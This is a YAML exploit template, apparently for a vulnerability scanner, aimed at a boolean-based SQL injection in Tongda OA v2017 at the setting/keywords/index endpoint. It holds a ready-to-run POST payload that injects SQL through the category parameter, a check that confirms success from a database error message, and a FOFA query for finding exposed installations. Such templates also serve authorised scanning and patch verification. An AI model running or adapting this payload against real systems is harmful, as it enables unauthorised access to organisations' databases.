product: 通达OA
vName: 通达OA v2017 setting-keywords-index接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 通达OA v2017-布尔型SQL注入(/general/document/index.php/setting/keywords/index)
version: 通达OA 2017
note: ''
search:
  FOFA: app="TDXK-通达OA"
protocol: http
link: https://baijiahao.baidu.com/s?id=1722749185213172939&wfr=spider&for=pc
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /general/document/index.php/setting/keywords/index
      dataJson:
        _SERVER[QUERY_STRING]: category=1'+and@`'`+or+if('ot'='oot',1,exp(710))--+-
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - SQL语句执行错误
            logic: and